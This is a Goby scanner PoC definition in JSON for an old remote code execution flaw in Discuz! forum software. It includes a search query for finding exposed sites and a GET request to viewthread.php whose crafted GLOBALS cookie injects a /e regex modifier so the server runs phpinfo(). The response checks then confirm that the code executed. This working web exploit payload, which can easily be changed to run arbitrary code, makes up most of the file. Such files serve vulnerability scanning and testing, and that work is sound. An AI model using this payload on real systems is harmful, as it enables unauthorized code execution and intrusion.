{ "Name": "Discuz RCE WOOYUN-2010-080723", "Level": "3", "Tags": [ "rce" ], "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"", "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.", "Product": "Discuz!", "Homepage": "https://www.discuz.net/", "Author": "", "Impact": "Since the default value of request_order in the php.ini setting in php5.3.x version is GP, $_COOKIE is no longer included in $_REQUEST. We overwrite the global variable by passing in $GLOBALS in the cookie, resulting in a code execution vulnerability.", "Recommendation": "", "References": [ "https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723" ], "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/viewthread.php?tid=10", "follow_redirect": false, "header": { "Cookie": "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=phpinfo();" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "PHP Version", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "System", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }